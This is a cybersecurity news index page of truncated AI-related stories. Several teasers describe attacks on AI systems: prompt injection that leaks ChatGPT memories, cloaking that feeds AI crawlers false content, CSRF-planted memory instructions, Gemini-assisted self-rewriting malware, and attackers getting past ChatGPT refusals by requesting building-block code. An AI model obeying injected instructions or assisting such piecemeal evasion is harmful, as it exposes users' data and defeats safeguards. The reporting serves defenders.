#1 Trusted Cybersecurity News Platform
Followed by 5.20+ million
The Hacker News Logo
Subscribe – Get Latest News
Salesforce Security Handbook

artificial intelligence | Breaking Cybersecurity News | The Hacker News

Category — artificial intelligence
Google Uncovers PROMPTFLUX Malware That Uses Gemini AI to Rewrite Its Code Hourly

Google Uncovers PROMPTFLUX Malware That Uses Gemini AI to Rewrite Its Code Hourly

Nov 05, 2025 Artificial Intelligence / Threat Intelligence
Google on Wednesday said it discovered an unknown threat actor using an experimental Visual Basic Script (VB Script) malware dubbed PROMPTFLUX that interacts with its Gemini artificial intelligence (AI) model API to write its own source code for improved obfuscation and evasion. "PROMPTFLUX is written in VBScript and interacts with Gemini's API to request specific VBScript obfuscation and evasion techniques to facilitate 'just-in-time' self-modification, likely to evade static signature-based detection," Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News. The novel feature is part of its "Thinking Robot" component, which periodically queries the large language model (LLM), Gemini 1.5 Flash or later in this case, to obtain new code so as to sidestep detection. This, in turn, is accomplished by using a hard-coded API key to send the query to the Gemini API endpoint. The prompt sent to the model is both highly specif...
Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Nov 05, 2025 Artificial Intelligence / Vulnerability
Cybersecurity researchers have disclosed a new set of vulnerabilities impacting OpenAI's ChatGPT artificial intelligence (AI) chatbot that could be exploited by an attacker to steal personal information from users' memories and chat histories without their knowledge. The seven vulnerabilities and attack techniques, according to Tenable, were found in OpenAI's GPT-4o and GPT-5 models. OpenAI has since addressed some of them .  These issues expose the AI system to indirect prompt injection attacks , allowing an attacker to manipulate the expected behavior of a large language model (LLM) and trick it into performing unintended or malicious actions, security researchers Moshe Bernstein and Liv Matan said in a report shared with The Hacker News. The identified shortcomings are listed below - Indirect prompt injection vulnerability via trusted sites in Browsing Context, which involves asking ChatGPT to summarize the contents of web pages with malicious instructions added...
Google’s AI ‘Big Sleep’ Finds 5 New Vulnerabilities in Apple’s Safari WebKit

Google's AI 'Big Sleep' Finds 5 New Vulnerabilities in Apple's Safari WebKit

Nov 04, 2025 Artificial Intelligence / Vulnerability
Google's artificial intelligence (AI)-powered cybersecurity agent called Big Sleep has been credited by Apple for discovering as many as five different security flaws in the WebKit component used in its Safari web browser that, if successfully exploited, could result in a browser crash or memory corruption. The list of vulnerabilities is as follows - CVE-2025-43429 - A buffer overflow vulnerability that may lead to an unexpected process crash when processing maliciously crafted web content (addressed through improved bounds checking) CVE-2025-43430 - An unspecified vulnerability that could result in an unexpected process crash when processing maliciously crafted web content (addressed through improved state management) CVE-2025-43431 & CVE-2025-43433 - Two unspecified vulnerabilities that may lead to memory corruption when processing maliciously crafted web content (addressed through improved memory handling) CVE-2025-43434 - A use-after-free vulnerability that may ...
cyber security

2025 Cybersecurity Assessment Report: Navigating the New Reality

websiteBitdefenderCybersecurity / Attack Surface
Insights from 1,200 security professionals reveal perception gaps, concealed breaches, and new concerns about AI-backed attacks.
cyber security

Keeper Security recognized in the 2025 Gartner® Magic Quadrant™ for PAM

websiteKeeper SecurityAgentic AI / Identity Management
Access the full Magic Quadrant report and see how KeeperPAM compares to other leading PAM platforms.
OpenAI Unveils Aardvark: GPT-5 Agent That Finds and Fixes Code Flaws Automatically

OpenAI Unveils Aardvark: GPT-5 Agent That Finds and Fixes Code Flaws Automatically

Oct 31, 2025 Artificial Intelligence / Code Security
OpenAI has announced the launch of an "agentic security researcher" that's powered by its GPT-5 large language model (LLM) and is programmed to emulate a human expert capable of scanning, understanding, and patching code. Called Aardvark , the artificial intelligence (AI) company said the autonomous agent is designed to help developers and security teams flag and fix security vulnerabilities at scale. It's currently available in private beta. "Aardvark continuously analyzes source code repositories to identify vulnerabilities, assess exploitability, prioritize severity, and propose targeted patches," OpenAI noted . It works by embedding itself into the software development pipeline, monitoring commits and changes to codebases, detecting security issues and how they might be exploited, and proposing fixes to address them using LLM-based reasoning and tool-use. Powering the agent is GPT‑5 , which OpenAI introduced in August 2025. The company describes it...
Google's Built-In AI Defenses on Android Now Block 10 Billion Scam Messages a Month

Google's Built-In AI Defenses on Android Now Block 10 Billion Scam Messages a Month

Oct 30, 2025 Mobile Security / Artificial Intelligence
Google on Thursday revealed that the scam defenses built into Android safeguard users around the world from more than 10 billion suspected malicious calls and messages every month. The tech giant also said it has blocked over 100 million suspicious numbers from using Rich Communication Services (RCS), an evolution of the SMS protocol, thereby preventing scams before they could even be sent. In recent years, the company has adopted various safeguards to combat phone call scams and automatically filter known spam using on-device artificial intelligence and move them automatically to the "spam & blocked" folder in the Google Messages app for Android. Earlier this month, Google also globally rolled out safer links in Google Messages, warning users when they attempt to click on any URLs in a message flagged as spam and step them visiting the potentially harmful website, unless the message is marked as "not spam." Google said its analysis of user-submitted rep...
New AI-Targeted Cloaking Attack Tricks AI Crawlers Into Citing Fake Info as Verified Facts

New AI-Targeted Cloaking Attack Tricks AI Crawlers Into Citing Fake Info as Verified Facts

Oct 29, 2025 Machine Learning / AI Safety
Cybersecurity researchers have flagged a new security issue in agentic web browsers like OpenAI ChatGPT Atlas that exposes underlying artificial intelligence (AI) models to context poisoning attacks. In the attack devised by AI security company SPLX, a bad actor can set up websites that serve different content to browsers and AI crawlers run by ChatGPT and Perplexity. The technique has been codenamed AI-targeted cloaking . The approach is a variation of search engine cloaking, which refers to the practice of presenting one version of a web page to users and a different version to search engine crawlers with the end goal of manipulating search rankings. The only difference in this case is that attackers optimize for AI crawlers from various providers by means of a trivial user agent check that leads to content delivery manipulation. "Because these systems rely on direct retrieval, whatever content is served to them becomes ground truth in AI Overviews, summaries, or autonom...
Discover Practical AI Tactics for GRC — Join the Free Expert Webinar

Discover Practical AI Tactics for GRC — Join the Free Expert Webinar

Oct 29, 2025 Artificial Intelligence / Compliance
Artificial Intelligence (AI) is rapidly transforming Governance, Risk, and Compliance (GRC) . It's no longer a future concept—it's here, and it's already reshaping how teams operate. AI's capabilities are profound: it's speeding up audits, flagging critical risks faster, and drastically cutting down on time-consuming manual work. This leads to greater efficiency, higher accuracy, and a more proactive GRC function. However, this powerful shift introduces significant new challenges. AI brings its own set of risks, including potential bias, dangerous blind spots, and regulatory gaps that are only beginning to be addressed by governing bodies. Staying ahead of this curve—not just struggling to keep up—requires clear, practical knowledge. Don't Just Stay Afloat—Master the Change To help you navigate this complex landscape, we invite you to our free, high-impact webinar, " The Future of AI in GRC: Opportunities, Risks, and Practical Insights . " This se...
Preparing for the Digital Battlefield of 2026: Ghost Identities, Poisoned Accounts, & AI Agent Havoc

Preparing for the Digital Battlefield of 2026: Ghost Identities, Poisoned Accounts, & AI Agent Havoc

Oct 29, 2025 Artificial Intelligence / Data Breach
BeyondTrust's annual cybersecurity predictions point to a year where old defenses will fail quietly, and new attack vectors will surge. Introduction The next major breach won't be a phished password. It will be the result of a massive, unmanaged identity debt. This debt takes many forms: it's the "ghost" identity from a 2015 breach lurking in your IAM, the privilege sprawl from thousands of new AI agents bloating your attack surface , or the automated account poisoning that exploits weak identity verification in financial systems. All of these vectors—physical, digital, new, and old—are converging on one single point of failure: identity .  Based on analysis from BeyondTrust's cybersecurity experts, here are three critical identity-based threats that will define the coming year:  1. Agentic AI Emerges as the Ultimate Attack Vector By 2026, agentic AI will be connected to nearly every technology we operate, effectively becoming the new middleware for most organizations. ...
New ChatGPT Atlas Browser Exploit Lets Attackers Plant Persistent Hidden Commands

New ChatGPT Atlas Browser Exploit Lets Attackers Plant Persistent Hidden Commands

Oct 27, 2025 Artificial Intelligence / Vulnerability
Cybersecurity researchers have discovered a new vulnerability in OpenAI's ChatGPT Atlas web browser that could allow malicious actors to inject nefarious instructions into the artificial intelligence (AI)-powered assistant's memory and run arbitrary code. "This exploit can allow attackers to infect systems with malicious code, grant themselves access privileges, or deploy malware," LayerX Security Co-Founder and CEO, Or Eshed, said in a report shared with The Hacker News. The attack, at its core, leverages a cross-site request forgery ( CSRF ) flaw that could be exploited to inject malicious instructions into ChatGPT's persistent memory. The corrupted memory can then persist across devices and sessions, permitting an attacker to conduct various actions, including seizing control of a user's account, browser, or connected systems, when a logged-in user attempts to use ChatGPT for legitimate purposes. Memory, first introduced by OpenAI in February 2024, is...
Secure AI at Scale and Speed — Learn the Framework in this Free Webinar

Secure AI at Scale and Speed — Learn the Framework in this Free Webinar

Oct 23, 2025 Artificial Intelligence / Data Protection
AI is everywhere—and your company wants in. Faster products, smarter systems, fewer bottlenecks. But if you're in security, that excitement often comes with a sinking feeling. Because while everyone else is racing ahead, you're left trying to manage a growing web of AI agents you didn't create, can't fully see, and weren't designed to control. Join our upcoming webinar and learn how to make AI security work with you, not against you . The Quiet Crisis No One Talks About Did you know most companies now have 100 AI agents for every one human employee? Even more shocking? 99% of those AI identities are completely unmanaged. No oversight. No lifecycle controls. And every one of them could be a backdoor waiting to happen. It's not your fault. Traditional tools weren't built for this new AI world. But the risks are real—and growing. Let's Change That. Together. In our free webinar, " Turning Controls into Accelerators of AI Adoption ," we'll help you flip the script. Th...
Securing AI to Benefit from AI

Securing AI to Benefit from AI

Oct 21, 2025 Artificial Intelligence / Security Operations
Artificial intelligence (AI) holds tremendous promise for improving cyber defense and making the lives of security practitioners easier. It can help teams cut through alert fatigue, spot patterns faster, and bring a level of scale that human analysts alone can't match. But realizing that potential depends on securing the systems that make it possible. Every organization experimenting with AI in security operations is, knowingly or not, expanding its attack surface. Without clear governance, strong identity controls, and visibility into how AI makes its decisions, even well-intentioned deployments can create risk faster than they reduce it. To truly benefit from AI, defenders need to approach securing it with the same rigor they apply to any other critical system. That means establishing trust in the data it learns from, accountability for the actions it takes, and oversight for the outcomes it produces. When secured correctly, AI can amplify human capability instead of replacing it t...
Identity Security: Your First and Last Line of Defense

Identity Security: Your First and Last Line of Defense

Oct 17, 2025 Artificial Intelligence / Identity Security
The danger isn't that AI agents have bad days — it's that they never do. They execute faithfully, even when what they're executing is a mistake. A single misstep in logic or access can turn flawless automation into a flawless catastrophe. This isn't some dystopian fantasy—it's Tuesday at the office now. We've entered a new phase where autonomous AI agents act with serious system privileges. They execute code, handle complex tasks, and access sensitive data with unprecedented autonomy. They don't sleep, don't ask questions, and don't always wait for permission. That's powerful. That's also risky. Because today's enterprise threats go way beyond your garden-variety phishing scams and malware. The modern security perimeter? It's all about identity management. Here's the million-dollar question every CISO should be asking: Who or what has access to your critical systems, can you secure and govern that access, and can you actually prove it? Ho...
Architectures, Risks, and Adoption: How to Assess and Choose the Right AI-SOC Platform

Architectures, Risks, and Adoption: How to Assess and Choose the Right AI-SOC Platform

Oct 16, 2025 Artificial Intelligence / Data Privacy
Scaling the SOC with AI - Why now?  Security Operations Centers (SOCs) are under unprecedented pressure. According to SACR's AI-SOC Market Landscape 2025 , the average organization now faces around 960 alerts per day , while large enterprises manage more than 3,000 alerts daily from an average of 28 different tools . Nearly 40% of those alerts go uninvestigated , and 61% of security teams admit to overlooking alerts that later proved critical. The takeaway is clear: the traditional SOC model can't keep up. AI has now moved from experimentation to execution inside the SOC. 88% of organizations that don't yet run an AI-driven SOC plan to evaluate or deploy one within the next year. But as more vendors promote "AI-powered SOC automation," the challenge for security leaders has shifted from awareness to evaluation. The key question is no longer whether AI belongs in the SOC, but how to measure its real impact and select a platform that delivers value without introducing signi...
What AI Reveals About Web Applications— and Why It Matters

What AI Reveals About Web Applications— and Why It Matters

Oct 14, 2025 Artificial Intelligence / Web Security
Before an attacker ever sends a payload, they've already done the work of understanding how your environment is built. They look at your login flows, your JavaScript files, your error messages, your API documentation, your GitHub repos. These are all clues that help them understand how your systems behave. AI is significantly accelerating reconnaissance and enabling attackers to map your environment with greater speed and precision. While the narrative often paints AI as running the show, we're not seeing AI take over offensive operations end to end. AI is not autonomously writing exploits, chaining attacks, and breaching systems without the human in the loop. What it is doing is speeding up the early and middle stages of the attacker workflow: gathering information, enriching it, and generating plausible paths to execution.  Think of it like AI-generated writing; AI can produce a draft quickly given the right parameters, but someone still needs to review, refine, and tune it f...
The AI SOC Stack of 2026: What Sets Top-Tier Platforms Apart?

The AI SOC Stack of 2026: What Sets Top-Tier Platforms Apart?

Oct 10, 2025 Artificial Intelligence / Threat Detection
The SOC of 2026 will no longer be a human-only battlefield. As organizations scale and threats evolve in sophistication and velocity, a new generation of AI-powered agents is reshaping how Security Operations Centers (SOCs) detect, respond, and adapt. But not all AI SOC platforms are created equal. From prompt-dependent copilots to autonomous, multi-agent systems, the current market offers everything from smart assistants to force-multiplying automation. While adoption is still early— estimated at 1–5% penetration according to Gartner —the shift is undeniable. SOC teams must now ask a fundamental question: What type of AI belongs in my security stack? The Limits of Traditional SOC Automation Despite promises from legacy SOAR platforms and rule-based SIEM enhancements, many security leaders still face the same core challenges: Analyst alert fatigue from redundant low-fidelity triage tasks Manual context correlation across disparate tools and logs Disjointed and static detect...
From HealthKick to GOVERSHELL: The Evolution of UTA0388's Espionage Malware

From HealthKick to GOVERSHELL: The Evolution of UTA0388's Espionage Malware

Oct 09, 2025 Cyber Espionage / Artificial Intelligence
A China-aligned threat actor codenamed UTA0388 has been attributed to a series of spear-phishing campaigns targeting North America, Asia, and Europe that are designed to deliver a Go-based implant known as GOVERSHELL . "The initially observed campaigns were tailored to the targets, and the messages purported to be sent by senior researchers and analysts from legitimate-sounding, completely fabricated organizations," Volexity said in a Wednesday report. "The goal of these spear phishing campaigns was to socially engineer targets into clicking links that led to a remotely hosted archive containing a malicious payload." Since then, the threat actor behind the attacks is said to have leveraged different lures and fictional identities, spanning several languages, including English, Chinese, Japanese, French, and German. Early iterations of the campaigns have been found to embed links to phishing content either hosted on a cloud-based service or their own infrastruc...
ThreatsDay Bulletin: MS Teams Hack, MFA Hijacking, $2B Crypto Heist, Apple Siri Probe & More

ThreatsDay Bulletin: MS Teams Hack, MFA Hijacking, $2B Crypto Heist, Apple Siri Probe & More

Oct 09, 2025 Cybersecurity / Hacking News
Cyber threats are evolving faster than ever. Attackers now combine social engineering, AI-driven manipulation, and cloud exploitation to breach targets once considered secure. From communication platforms to connected devices, every system that enhances convenience also expands the attack surface. This edition of ThreatsDay Bulletin explores these converging risks and the safeguards that help preserve trust in an increasingly intelligent threat landscape. How Threat Actors Abuse Microsoft Teams Attackers Abuse Microsoft Teams for Extortion, Social Engineering, and Financial Theft Microsoft detailed the various ways threat actors can abuse its Teams chat software at various stages of the attack chain, even using it to support financial theft through extortion, social engineering, or technical means. " Octo Tempest has used communication apps, including Teams, to send taunting and threatening messages to organizations, defenders, and incident response teams as p...
From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Oct 09, 2025 Artificial Intelligence / Malware
Russian hackers' adoption of artificial intelligence (AI) in cyber attacks against Ukraine has reached a new level in the first half of 2025 (H1 2025), the country's State Service for Special Communications and Information Protection (SSSCIP) said. "Hackers now employ it not only to generate phishing messages, but some of the malware samples we have analyzed show clear signs of being generated with AI – and attackers are certainly not going to stop there," the agency said in a report published Wednesday. SSSCIP said 3,018 cyber incidents were recorded during the time period, up from 2,575 in the second half of 2024 (H2 2024). Local authorities and military entities witnessed an increase in attacks compared to H2 2024, while those targeting government and energy sectors declined. One notable attack observed involved UAC-0219's use of malware called WRECKSTEEL in attacks aimed at state administration bodies and critical infrastructure facilities in the country...
Severe Framelink Figma MCP Vulnerability Lets Hackers Execute Code Remotely

Severe Framelink Figma MCP Vulnerability Lets Hackers Execute Code Remotely

Oct 08, 2025 Vulnerability / Software Security
Cybersecurity researchers have disclosed details of a now-patched vulnerability in the popular figma-developer-mcp Model Context Protocol ( MCP ) server that could allow attackers to achieve code execution. The vulnerability, tracked as CVE-2025-53967 (CVSS score: 7.5), is a command injection bug stemming from the unsanitized use of user input, opening the door to a scenario where an attacker can send arbitrary system commands. "The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (|, >, &&, etc.)," according to a GitHub advisory for the flaw. "Successful exploitation can lead to remote code execution under the server process's privileges." Given that the Framelink Figma MCP server exposes various tools to perform operations in Figma using artificial intelligence (AI)-powered coding agents like Cursor, an attacker co...
OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

Oct 08, 2025 Artificial Intelligence / Threat Intelligence
OpenAI on Tuesday said it disrupted three activity clusters for misusing its ChatGPT artificial intelligence (AI) tool to facilitate malware development. This includes a Russian‑language threat actor, who is said to have used the chatbot to help develop and refine a remote access trojan (RAT), a credential stealer with an aim to evade detection. The operator also used several ChatGPT accounts to prototype and troubleshoot technical components that enable post‑exploitation and credential theft. "These accounts appear to be affiliated with Russian-speaking criminal groups, as we observed them posting evidence of their activities in a Telegram channel dedicated to those actors," OpenAI said. The AI company said while its large language models (LLMs) refused the threat actor's direct requests to produce malicious content, they worked around the limitation by creating building-block code, which was then assembled to create the workflows. Some of the produced output invo...
c
Expert Insights Articles Videos
Cybersecurity Resources